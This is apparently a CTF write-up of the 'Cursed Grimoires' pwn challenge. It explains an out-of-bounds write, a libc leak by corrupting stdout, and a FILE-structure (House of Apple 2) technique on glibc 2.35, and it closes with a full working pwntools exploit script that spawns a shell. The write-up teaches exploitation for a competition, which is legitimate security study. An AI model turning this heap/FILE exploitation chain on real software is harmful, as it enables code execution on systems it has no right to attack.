Last weekend, I spent my time competing at STACK the Flags CTF 2022 held by GovTech SG with team PDKT then sad. We got 2nd place in the Open Category. Thanks a lot to GovTech SG for the amazing CTF!
On this CTF, I managed to solve all of the pwn challenges, and today, I will make a writeup on one of the challenges called Cursed Grimoires, because my solution for that challenge is related to the FILE Structure Attack on the recent GLIBC 2.35 (I’ve made a promise before to continue my FILE Structure Attack series, so I try to make this writeup as detailed as possible during explaining the FILE Structure part).
I recommend you to read my first article about FILE Structure Attack in here to get a basic understanding of how FILE Structure Attack works. You can say that this post is like the second part of that article, but focusing only in the glibc 2.35.
Cursed Grimoires
Initial Analysis
We were given a zip file containing the challenge binary called cursed_grimoires and the libc file that is being used to run the binary. Let’s start the analysis by checking the properties of the binary via checksec.
1
2
3
4
5
6
╰─❯ checksec cursed_grimoires
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
As we can see, the binary:
Full RELRO: It means we can’t modify the GOT table.
Canary found: It means the binary tries to protect against buffer overflow by storing a canary value in the stack (Which will throw an error if we do buffer overflow and overwrite it with an incorrect value).
NX enabled: It means the stack area isn’t executable (We can’t jump to the address in the stack area).
PIE enabled: It means the address of the binary’s functions itself will be randomized on each execution.
Now, let’s check the libc version
1
2
╰─❯ ./libc.so.6
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35.
Okay, the binary used glibc 2.35, which is quite hard to be exploited.
Now that we have known the properties, seems like the mitigation are quite strong. Let’s continue our analysis by disassembling the binary methods one by one.
From the main function, it will call menu() on each iteration, and we can see that there are three menus that we can select based on our choice’s input, create_grimoire, edit_grimoire, and exit. Let’s continue our analysis by disassembling those methods.
unsigned__int64create_grimoire(){size_tsize;// [rsp+0h] [rbp-10h] BYREF
unsigned__int64v2;// [rsp+8h] [rbp-8h]
v2=__readfsqword(0x28u);printf("\x1B[2J\x1B[H");if(!GRIMOIRE){printf("Size of grimoire => ");size=0LL;__isoc99_scanf("%zu",&size);while(getchar()!=10);GRIMOIRE=(char*)malloc(size);printf("Write your contents => ");fgets(GRIMOIRE,size-1,stdin);}returnv2-__readfsqword(0x28u);}
From the disassemble’s result, we can see that the create_grimoire method will do three sequential operations:
Check whether the global variable GRIMOIRE is null or not. This means that we can call create_grimoire only one time per execution.
Ask for the size of the grimoire, and then it will call malloc to create a new chunk with the input size.
Ask for the content of the newly created chunk.
One thing that we can notice in this method is that we can set a big size for the chunk that we want to create because there isn’t any restriction. Keep this in mind first because this will be useful later. Let’s move to the edit_grimoire method.
At a glance, we can see that this method will allow us to edit the content of the newly allocated chunk. It will only allow us to edit one char per call (Give the index, and then it will replace the stored value in the given index with the new value that you just gave).
If we read this function method carefully, notice that there is a bug in this method. There isn’t any check whether the index that we give is a valid index or not (valid means the index is still inside the allocated chunk’s area). This means that we can do Out-Of-Bounds write on any address that we like, relative to the chunks.
To summarize, some important notes that we have taken from our analysis:
There are three menus that we can choose (create, edit, and exit).
We can allocate one chunk with any size that we want.
There is a bug in the edit method which leads us to OOB write on any address that we want (relative to our allocated chunk’s address)
Exploitation
Now, based on those important notes, we need to think about how to abuse the OOB bug that we found so that we can leverage it into Remote-Code-Execution (RCE). Up until now:
Even though we have an OOB write, due to ASLR (address randomization), we don’t know the exact address of our created chunk in the heap nor the offset difference between our targeted address with our chunk.
Leveraging the OOB bug with malloc behavior
So, what should we do? Remember that in this binary, we are allowed to allocate a chunk of any size. Let’s check the manuals of the malloc. Turns out, there are some interesting notes in the man malloc result.
1
2
3
4
5
6
7
NOTES
By default, Linux follows an optimistic memory allocation strategy. This means that when malloc() returns non-NULL there is no guarantee that the memory really is available. In case it
turns out that the system is out of memory, one or more processes will be killed by the OOM killer. For more information, see the description of /proc/sys/vm/overcommit_memory and
/proc/sys/vm/oom_adj in proc(5), and the Linux kernel source file Documentation/vm/overcommit-accounting.rst.
Normally, malloc() allocates memory from the heap, and adjusts the size of the heap as required, using sbrk(2). When allocating blocks of memory larger than MMAP_THRESHOLD bytes, the
glibc malloc() implementation allocates the memory as a private anonymous mapping using mmap(2).
Based on the notes, if we call malloc() with a big size, it will place our chunk in the mmapped page rather than the heap area. And reading through this article that I found, we can learn that a new page created by mmap will have a consistent offset difference from the libc starting area address. To prove this, let’s fire up our gdb to run the binary multiple time and test it by allocating a chunk with size 1000000.
As you can see, the chunk was placed not in the heap, but in a new page created by the mmap, and it was placed just before the libc (The offset difference is 0x00007f3b78a31000 - 0x00007f3b78939010 = 0xf7ff0). Let’s try to run it one more time to confirm it.
Yup, we can confirm that when we allocated a big chunk, the libc_base_address will be at chunk_address + 0xf7ff0. With this piece of information, now that we can leverage our OOB bug to be able to overwrite any value stored in the libc area by setting the index to 0xf7ff0 + libc_target_offset.
Getting a libc leak
Now that we have the power to overwrite any writeable area in the loaded libc, what should we do now? Remember that up until now, we don’t have any libc address leak yet. So, it would be a good idea to try finding a way on getting the libc leak.
One of the ways that I could think of is using a FILE Structure Attack. If you don’t have any idea or this is your first time hearing about it, I had written some basic knowledge about it in one of my blog’s articles. I believe that reading through that article first will give you a strong fundamental to understand the exploit for this challenge.
One of the tricks related to FILE Structure Attack that we could do to leak the libc address is based on this article. The article explained the trick on leaking the libc, but I will try to break it down one by one again based on what I did to understand the article.
Remember that the menu() function will be called on each iteration and it calls puts. So, based on the previous article, if we deep dive into the implementation of puts in the glibc source code, we will get a way to get a libc leak.
Let’s start breaking it down one by one starting from the puts method itself.
puts is an alias to _IO_puts. As you can see, the _IO_puts will call _IO_sputn (stdout, str, len), which based on this LOC in the glibc source code, is an alias to _IO_XSPUTN (__fp, __s, __n), which means it will jump to the stored pointer for __xsputn key in the stdout FILE.
Inspecting via GDB (or you can deep dive its source code as well), stdout vtable mapped the key __xsputn to the _IO_new_file_xsputn method.
size_t_IO_new_file_xsputn(FILE*f,constvoid*data,size_tn){constchar*s=(constchar*)data;size_tto_do=n;intmust_flush=0;size_tcount=0;...if(to_do+must_flush>0){size_tblock_size,do_write;/* Next flush the (full) buffer. */if(_IO_OVERFLOW(f,EOF)==EOF)/* If nothing else has to be written we must not signal the
caller that everything has been written. */returnto_do==0?EOF:n-to_do;/* Try to maintain alignment: write a whole number of blocks. */block_size=f->_IO_buf_end-f->_IO_buf_base;do_write=to_do-(block_size>=128?to_do%block_size:0);if(do_write){count=new_do_write(f,s,do_write);to_do-=count;if(count<do_write)returnn-to_do;}...}libc_hidden_ver(_IO_new_file_xsputn,_IO_file_xsputn)
If you read the code, it will call _IO_OVERFLOW(f, EOF) before calling new_do_write to write the actual string that we want to print. Based on the vtable above that we see in gdb (the _IO_file_jumps), calling _IO_OVERFLOW equivalents to jump to _IO_new_file_overflow. Let’s check the disassembly result of that method.
int_IO_new_file_overflow(FILE*f,intch){if(f->_flags&_IO_NO_WRITES)/* SET ERROR */{f->_flags|=_IO_ERR_SEEN;__set_errno(EBADF);returnEOF;}/* If currently reading or no buffer allocated. */if((f->_flags&_IO_CURRENTLY_PUTTING)==0||f->_IO_write_base==NULL){...}if(ch==EOF)return_IO_do_write(f,f->_IO_write_base,f->_IO_write_ptr-f->_IO_write_base);...}libc_hidden_ver(_IO_new_file_overflow,_IO_file_overflow)
During calling this method, keep in mind first that the passed argument for ch is EOF. And notice this interesting LOC:
int_IO_new_do_write(FILE*fp,constchar*data,size_tto_do){return(to_do==0||(size_t)new_do_write(fp,data,to_do)==to_do)?0:EOF;}libc_hidden_ver(_IO_new_do_write,_IO_do_write)staticsize_tnew_do_write(FILE*fp,constchar*data,size_tto_do){size_tcount;if(fp->_flags&_IO_IS_APPENDING)/* On a system without a proper O_APPEND implementation,
you would need to sys_seek(0, SEEK_END) here, but is
not needed nor desirable for Unix- or Posix-like systems.
Instead, just indicate that offset (before and after) is
unpredictable. */fp->_offset=_IO_pos_BAD;elseif(fp->_IO_read_end!=fp->_IO_write_base){off64_tnew_pos=_IO_SYSSEEK(fp,fp->_IO_write_base-fp->_IO_read_end,1);if(new_pos==_IO_pos_BAD)return0;fp->_offset=new_pos;}count=_IO_SYSWRITE(fp,data,to_do);...}...#define _IO_SYSWRITE(FP, DATA, LEN) JUMP2 (__write, FP, DATA, LEN)
...ssize_t_IO_new_file_write(FILE*f,constvoid*data,ssize_tn){ssize_tto_do=n;while(to_do>0){ssize_tcount=(__builtin_expect(f->_flags2&_IO_FLAGS2_NOTCANCEL,0)?__write_nocancel(f->_fileno,data,to_do):__write(f->_fileno,data,to_do));if(count<0){f->_flags|=_IO_ERR_SEEN;break;}to_do-=count;data=(void*)((char*)data+count);}n-=to_do;if(f->_offset>=0)f->_offset+=n;returnn;}
As you can see, _IO_do_write is an alias to _IO_new_do_write, which eventually will call new_do_write, and finally, it will call _IO_SYSWRITE (fp, data, to_do). _IO_SYSWRITE will jump to the vtable stored pointer mapped from key __write, which based on the vtable that we saw before in stdout, is equivalent to calling _IO_new_file_write. And finally, this method will call write(f->fileno, data, to_do)
To summarize, below are the possible chain calls that we can trigger when we call puts:
As you can see from the chain summary, during calling _IO_OVERFLOW inside the puts method, there is a possibility that we can call write(stdout->fileno, stdout->_IO_write_base, stdout->_IO_write_ptr - stdout->_IO_write_base).
Back to the gdb result of stdout that we see before, stdout->fileno is 1 and both stdout->_IO_write_base and stdout->_IO_write_ptr are currently pointing to the same address, and the address is part of the libc region. Taking the stdout->_IO_write_base address from the previous gdb result (which is 0x7ffff7fae803), let’s inspect on what is the content of the address.
As you can see, there is a libc address inside the address pointed by the _IO_write_base, specifically _IO_write_base+5. So, if we’re somehow able to overwrite the _IO_write_ptr address of the stdout, so that it won’t be pointing to the same address as _IO_write_base (making _IO_write_ptr > _IO_write_base), we will get a libc leak during calling puts, because when puts called _IO_OVERFLOW, it will eventually call write(1, _IO_write_base, _IO_write_ptr - _IO_write_base), which instructing it to print the content between the range of the _IO_write_ptr and _IO_write_base.
However, notes that there are some constraints that we need to fulfill so that we can successfully execute that chain:
During calling _IO_new_file_overflow, notice that we need to bypass these checks before calling the _IO_do_write:
if (f->_flags & _IO_NO_WRITES) needs to return False.
So, _IO_NO_WRITES is 0x0008, which mean stdout->_flags & 0x0008 should be 0
if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL) needs to return False.
_IO_write_base == NULL will always return False because it points to the libc area.
(stdout->_flags & _IO_CURRENTLY_PUTTING) == 0 needs to return False as well. _IO_CURRENTLY_PUTTING is 0x0800, which mean stdout->_flags & 0x0800 should be 1
if (ch == EOF) needs to return True.
This will always be satisfied because puts always set the ch to EOF.
Move to the new_do_write, we need to skip the second if condition, so we need to:
Make this if (fp->_flags & _IO_IS_APPENDING) return True.
_IO_IS_APPENDING is 0x1000, SO stdout->_flags & 0x1000 should be 1.
So, based on the above constraints, what value that we need to set for the stdout->_flags is 0x1800, so that:
# Create a big chunk, so that our chunk is located on the newly page# created by mmap (To be precise, at libc_base-0xf7ff0)chunk_size=1000000offset_to_libc=0xf7ff0create(r,chunk_size,b'a'*8)
Now, let’s start overwriting the _flags
1
2
3
4
5
6
7
8
9
10
11
12
13
14
'''
Leak libc base via stdout
'''# Prepare the correct offset for stdout and stderrstdout_offset_from_chunk=offset_to_libc+libc.symbols['_IO_2_1_stdout_']stderr_offset_from_chunk=offset_to_libc+libc.symbols['_IO_2_1_stderr_']log.info(f'Stdout offset: {hex(stdout_offset_from_chunk)}')log.info(f'Stderr offset: {hex(stderr_offset_from_chunk)}')# Overwrite stdout->_flags to 0x1800flags_offset=0x0# stdout->_flags = &stdout + 0x0flags=p32(0x1800)foriinrange(len(flags)):edit(r,stdout_offset_from_chunk+flags_offset+i,flags[i])
Now that we have successfully overwritten the stdout flags, let’s overwrite the _IO_write_ptr. After we do the edit, we will get a libc leak immediately because the binary will print the menu.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# Overwrite stdout->_IO_write_ptr to be larger thanwrite_ptr_offset=0x28# stdout->_IO_write_ptr = &stdout + 0x28write_ptr_lsb=0x50# You can choose any value. I choose 0x50edit(r,stdout_offset_from_chunk+write_ptr_offset,write_ptr_lsb)# Now, when the binary called menu() (which will call puts())# It will leak a libc address, which equivalents to _IO_stdfile_1_lockout=r.recv(16)[5:]leaked_libc=u64(out[:8])log.info(f'Leaked libc : {hex(leaked_libc)}')libc_base=leaked_libc-libc.symbols['_IO_stdfile_1_lock']log.info(f'Libc base : {hex(libc_base)}')libc.address=libc_basechunk_addr=libc_base-0xf7ff0log.info(f'Chunk addr : {hex(chunk_addr)}')
Above is the result of our current script. So now, we have successfully retrieved a libc leak. Time to move to the next step, which gaining code execution.
Gaining Remote Code Execution (RCE)
Up until now, we have:
OOB write to libc area.
Libc base address from the leak.
We need to leverage the OOB bug and the libc base address leaked info to gain RCE. One thing that comes in mind is using the knowledge that I gathered from the recent discussion about gaining RIP control from FILE structure attack in Glibc 2.35.
To give some context, in the old version of glibc, we can overwrite the file->vtable address with our fake vtable, so that let’s say when a method wants to call _IO_OVERFLOW, instead of jumping to the correct address, it will jump to our desired address that we set in our fake vtable.
However, this has been mitigated because the glibc will check whether the vtable that is stored in the FILE is in the correct region or not. Check the below LOCs:
staticinlineconststruct_IO_jump_t*IO_validate_vtable(conststruct_IO_jump_t*vtable){/* Fast path: The vtable pointer is within the __libc_IO_vtables
section. */uintptr_tsection_length=__stop___libc_IO_vtables-__start___libc_IO_vtables;uintptr_tptr=(uintptr_t)vtable;uintptr_toffset=ptr-(uintptr_t)__start___libc_IO_vtables;if(__glibc_unlikely(offset>=section_length))/* The vtable pointer is not in the expected section. Use the
slow path, which will terminate the process if necessary. */_IO_vtable_check();returnvtable;}#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)
#define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
# define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))
#define _IO_JUMPS_FILE_plus(THIS) \
_IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE_plus, vtable)
Taking example let’s say a method tries to call _IO_OVERRFLOW, it will try to do the jump to the stored pointer in the vtable value mapped with key __overflow, and before jumping into it, it will validate first whether the stored pointer is in the valid area or not by calling IO_validate_vtable.
So that trick where we set up our fake vtable to jump to a method outside the vtable section area no longer works. However, because the check only validates whether the stored pointer is in vtable region or not, we can still misalign the table (For example, shift the vtable by one entry, so that when a function called _IO_OVERFLOW, it will jump to _IO_UNDERFLOW instead due to the misalignment).
People try to find a way to abuse this check, and recently in this article by kylebot, he found that the glibc does the check only when jumping with macro _IO_JUMPS_FUNC, but it didn’t validate the check when it uses a macro to jump to the wide_vtable, which is _IO_WIDE_JUMPS_FUNC.
Also turns out, there is another article that has been published a few months ago that tried to abuse the same finding from kylebot. The method is called House of Apple 2, which was posted by roderick01 in this article. I’ll try to explain it in more detail based on my understanding during reading these two blogs.
Remember that the mitigation those were implemented in the recent glibc only checks whether the vtable stored in the FILE properties is still in the correct region or not. And the standard vtable that is being used for stdfile is _IO_file_jumps. But in fact, there is a lot of other vtable in the region that we can use, and one of them is _IO_wfile_jumps. Below is the default entry of the _IO_wfile_jumps printed via gdb:
Let’s try to take a look at the implementation of one of the functions which is _IO_wfile_overflow (This is the path that was discovered by both kylebot and roderick01).
wint_t_IO_wfile_overflow(FILE*f,wint_twch){if(f->_flags&_IO_NO_WRITES)/* SET ERROR */{f->_flags|=_IO_ERR_SEEN;__set_errno(EBADF);returnWEOF;}/* If currently reading or no buffer allocated. */if((f->_flags&_IO_CURRENTLY_PUTTING)==0){/* Allocate a buffer if needed. */if(f->_wide_data->_IO_write_base==0){_IO_wdoallocbuf(f);...}...}void_IO_wdoallocbuf(FILE*fp){if(fp->_wide_data->_IO_buf_base)return;if(!(fp->_flags&_IO_UNBUFFERED))if((wint_t)_IO_WDOALLOCATE(fp)!=WEOF)...}#define _IO_WDOALLOCATE(FP) WJUMP0 (__doallocate, FP)
#define WJUMP0(FUNC, THIS) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS)
#define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)
#define _IO_WIDE_JUMPS(THIS) \
_IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable
As you can see in the above, if we’re able to trigger WJUMP0, there isn’t any validation check whether the wide_vtable stored pointer is in the correct region or not, which means if we’re able to forge a fake wide_vtable and trigger the macro call (WJUMP0), we can jump to any address that we want just like the old glibc.
Also notice that the vtable that was used during _IO_WIDE_JUMPS will be taken from the fp->_wide_data->_wide_vtable. If you revisit the stdfile fields when we inspect it in the gdb, you can see there the stdfile has a field called _wide_data, which points to another struct _IO_wide_data_1. Below is the field stored in the _IO_wide_data_1 printed via gdb:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
gef➤ print _IO_wide_data_1
$10 = {
_IO_read_ptr = 0x0,
_IO_read_end = 0x0,
_IO_read_base = 0x0,
_IO_write_base = 0x0,
_IO_write_ptr = 0x0,
_IO_write_end = 0x0,
...
_shortbuf = L"",
_wide_vtable = 0x7ffff7faa0c0 <__GI__IO_wfile_jumps> <- This is the one that we can overwrite with our fake vtable
}
Based on that information, this is the possible chain call to be achieved if we misaligned the FILE vtable from _IO_file_jumps to _IO_wfile_jumps and trigger __overflow call. Below is the chain:
1
2
3
4
5
6
7
8
9
10
11
12
13
Assuming that we overwrite the FILE->vtable from _IO_file_jumps to _IO_wfile_jumps. When the binary try to call
_IO_OVERFLOW (fp, EOF), the chain would be:
_IO_OVERFLOW (fp, EOF)
|_ JUMP1 (__overflow, fp, EOF)
|_ (_IO_JUMPS_FUNC(fp)->__overflow) (fp, EOF)
|_ ((IO_validate_vtable (_IO_JUMPS_FILE_plus (fp)))->__overflow) (fp, EOF) <- Because we overwrite it to point to _IO_wfile_jumps, it will call _IO_wfile_overflow instead of _IO_new_file_overflow. This is still valid because its location is still in the correct region
|_ _IO_wfile_overflow(fp, EOF)
|_ _IO_wdoallocbuf(fp)
|_ _IO_WDOALLOCATE(fp)
|_ WJUMP0 (__doallocate, fp)
|_ (_IO_WIDE_JUMPS_FUNC(fp)->__doallocate) (fp)
|_ (_IO_WIDE_JUMPS(fp)->__doallocate) (fp) <- No Validation #profit :D
Notes that to achieve this call, there are some constraints that we need to fulfill:
In _IO_wfile_overflow, we need to bypass these checks to continue calling _IO_wdoallocbuf:
if (f->_flags & _IO_NO_WRITES) need to return False.
if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0) need to return True.
if (f->_wide_data->_IO_write_base == 0) need to return True.
In _IO_wdoallocbuf, we need to bypass these checks to continue calling _IO_WDOALLOCATE:
if (fp->_wide_data->_IO_buf_base) need to return False.
if (!(fp->_flags & _IO_UNBUFFERED)) need to return True.
_IO_UNBUFFERED is 0x0002, which means _flags & _IO_UNBUFFERED == 0 needs to be achieved.
And if those constraints are fulfilled, it will jump to the pointer stored in the fp->_wide_data->wide_vtable->__doallocate, where the rdi is a pointer to the FILE itself (fp).
Finally, this is a path that we could take to do FILE Structure Attack in glibc 2.35. For example, we can simply create a fake wide_vtable so that the __doallocate will point to system, which mean when we call _IO_WDOALLOCATE(fp), it will do system(fp). And if we forge the fp content to execute sh, that means we will get a shell :D
But first, how can we able to trigger _IO_OVERFLOW in the first place? We can abuse the third menu from the binary, which is exit. You can read the detail about the chain in my previous article about FILE Structure Attack, but the tl;dr is when we call exit, the binary will have a chain call like this:
1
2
3
4
5
exit
|_ _IO_cleanup
|_ _IO_flush_all_lockp
Iterate list of available files (stderr->stdout->stdin), and on each iteration it will call:
|_ _IO_OVERFLOW (fp, EOF)
The constraint to call _IO_OVERFLOW is here (taken from the _IO_flush_all_lockp code):
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
So, we need to set _mode to 0, and _IO_write_ptr > _IO_write_base
Because exit will iterate all available files, I choose to use the OOB write bug to overwrite the file structure of the stderr. To summarize, what should we do to stderr file structure to gain RCE upon exit are:
Create a fake _wide_vtable.
I decided to put it in my chunk_addr+0x100 address. Notes that our chunk_addr is in libc_base - 0xf7ff0.
__doallocate offset is 0x68, so fill chunk_addr+0x100+0x68 with system address.
Create a fake _wide_data.
I decided to put it in chunk_addr.
Set chunk_addr->_IO_write_base (which is &chunk_addr+0x20) to 0.
Set chunk_addr->_IO_buf_base (which is &chunk_addr+0x38) to 0.
Set chunk_addr->_wide_vtable (which is &chunk_addr+0xe0) to chunk_addr+0x100 (which is our fake_wide_vtable).
Set the stderr->_flags to the correct value. Some important notes:
Remember that at the end, because we forge the wide_vtable->__do_allocate(stderr) to system(stderr), that means the command that will be executed by system will start from stderr->_flags (because _flags is &stderr+0x0). We need to ensure that the _flags still fulfill the constraints, yet it’s able to execute our command. Some tricks that can be used:
kylebot set the _flags to 0x3b01010101010101, and _IO_read_ptr to /bin/sh\x00.
0x3b01010101010101 equivalent to \x01\x01\x01\x01\x01\x01\x01;, so by setting it like above, the final call will be system('\x01\x01\x01\x01\x01\x01\x01;/bin/sh'), which will trigger a shell, yet all of the if conditions constraints are fulfilled.
roderick01 set the _flags to " sh" (with double space in front). This still fulfill the constraints, and will call system(" sh") at the end.
Set the stderr->_IO_write_base to 0, and the stderr->_IO_write_pr to 1.
So that when we call exit, _IO_flush_all_lockp will call _IO_OVERFLOW(stderr, EOF).
Set the stderr->vtable to _IO_wfile_jumps.
So that when _IO_OVERFLOW(stderr, EOF) is called, instead of calling _IO_new_file_overflow, it will call _IO_wfile_overflow instead.
And after we successfully rewrite the stderr file structure, if we call exit, we should be able to get a shell!
Finally, let’s start to continue our script to implement those actions. First, create a fake _wide_vtable.
# Setup fake _wide_datafake_wide_data_addr=chunk_addrfake_wide_data_IO_write_base_offset_from_chunk=(fake_wide_data_addr-chunk_addr)+0x20fake_wide_data_IO_buf_base_offset_from_chunk=(fake_wide_data_addr-chunk_addr)+0x38fake_wide_data_wide_vtable_offset_from_chunk=(fake_wide_data_addr-chunk_addr)+0xe0fori,numinenumerate(p64(0)):# Set _wide_data->_IO_write_base_offset to 0edit(r,fake_wide_data_IO_write_base_offset_from_chunk+i,num)fori,numinenumerate(p64(0)):# Set _wide_data->_IO_buf_base_offset to 0edit(r,fake_wide_data_IO_buf_base_offset_from_chunk+i,num)fori,numinenumerate(p64(fake_wide_vtable_addr)):# Set _wide_data->_wide_vtable to fake_wide_vtable_addredit(r,fake_wide_data_wide_vtable_offset_from_chunk+i,num)
frompwnimport*exe=ELF("cursed_grimoires_patched")libc=ELF("./libc.so.6")ld=ELF("./ld-linux-x86-64.so.2")context.binary=execontext.arch='amd64'context.encoding='latin'context.log_level='INFO'warnings.simplefilter("ignore")remote_url="157.230.242.192"remote_port=30472gdbscript='''
'''defconn():ifargs.LOCAL:r=process([exe.path],env={})ifargs.PLT_DEBUG:gdb.attach(r,gdbscript=gdbscript)pause()else:r=remote(remote_url,remote_port)returnrr=conn()defcreate(r,size,content):r.sendlineafter(b'=> ',b'1')r.sendlineafter(b'=> ',str(size).encode())r.sendlineafter(b'=> ',content)defedit(r,offset,val):r.sendlineafter(b'=> ',b'2')r.sendlineafter(b'=> ',str(offset).encode())r.sendlineafter(b'=> ',bytes([val]))defexit_binary(r):r.sendlineafter(b'=> ',b'3')r.interactive()# Create a big chunk, so that our chunk is located on the newly page# created by mmap (To be precise, at libc_base-0xf7ff0)chunk_size=1000000offset_to_libc=0xf7ff0create(r,chunk_size,b'a'*8)'''
Leak libc base via stdout
'''# Prepare the correct offset for stdout and stderrstdout_offset_from_chunk=offset_to_libc+libc.symbols['_IO_2_1_stdout_']stderr_offset_from_chunk=offset_to_libc+libc.symbols['_IO_2_1_stderr_']log.info(f'Stdout offset: {hex(stdout_offset_from_chunk)}')log.info(f'Stderr offset: {hex(stderr_offset_from_chunk)}')# Overwrite stdout->_flags to 0x1800flags_offset=0x0# stdout->_flags = &stdout + 0x0flags=p32(0x1800)foriinrange(len(flags)):edit(r,stdout_offset_from_chunk+flags_offset+i,flags[i])# Overwrite stdout->_IO_write_ptr to be larger thanwrite_ptr_offset=0x28# stdout->_IO_write_ptr = &stdout + 0x28write_ptr_lsb=0x50# You can choose any value. I choose 0x50edit(r,stdout_offset_from_chunk+write_ptr_offset,write_ptr_lsb)# Now, when the binary called menu() (which will call puts())# It will leak a libc address, which equivalents to _IO_stdfile_1_lockout=r.recv(16)[5:]leaked_libc=u64(out[:8])log.info(f'Leaked libc : {hex(leaked_libc)}')libc_base=leaked_libc-libc.symbols['_IO_stdfile_1_lock']log.info(f'Libc base : {hex(libc_base)}')libc.address=libc_basechunk_addr=libc_base-0xf7ff0log.info(f'Chunk addr : {hex(chunk_addr)}')'''
Getting RIP Control via exit through stderr
'''# Setup fake _wide_vtablefake_wide_vtable_addr=chunk_addr+0x100fake_wide_vtable_doallocate_offset_from_chunk=(fake_wide_vtable_addr-chunk_addr)+0x68system_addr=libc.symbols['system']fori,numinenumerate(p64(system_addr)):edit(r,fake_wide_vtable_doallocate_offset_from_chunk+i,num)# Setup fake _wide_datafake_wide_data_addr=chunk_addrfake_wide_data_IO_write_base_offset_from_chunk=(fake_wide_data_addr-chunk_addr)+0x20fake_wide_data_IO_buf_base_offset_from_chunk=(fake_wide_data_addr-chunk_addr)+0x38fake_wide_data_wide_vtable_offset_from_chunk=(fake_wide_data_addr-chunk_addr)+0xe0fori,numinenumerate(p64(0)):# Set _wide_data->_IO_write_base_offset to 0edit(r,fake_wide_data_IO_write_base_offset_from_chunk+i,num)fori,numinenumerate(p64(0)):# Set _wide_data->_IO_buf_base_offset to 0edit(r,fake_wide_data_IO_buf_base_offset_from_chunk+i,num)fori,numinenumerate(p64(fake_wide_vtable_addr)):# Set _wide_data->_wide_vtable to fake_wide_vtable_addredit(r,fake_wide_data_wide_vtable_offset_from_chunk+i,num)# Forge stderrfake_stderr=FileStructure(0)fake_stderr.flags=u64(b' sh\x00\x00\x00\x00')fake_stderr._IO_write_base=0fake_stderr._IO_write_ptr=1# _IO_write_ptr > _IO_write_basefake_stderr._wide_data=fake_wide_data_addrfake_stderr.vtable=libc.symbols['_IO_wfile_jumps']fake_stderr_bytes=bytes(fake_stderr)fori,numinenumerate(fake_stderr_bytes):edit(r,stderr_offset_from_chunk+i,num)# Exit and profit :Dexit_binary(r)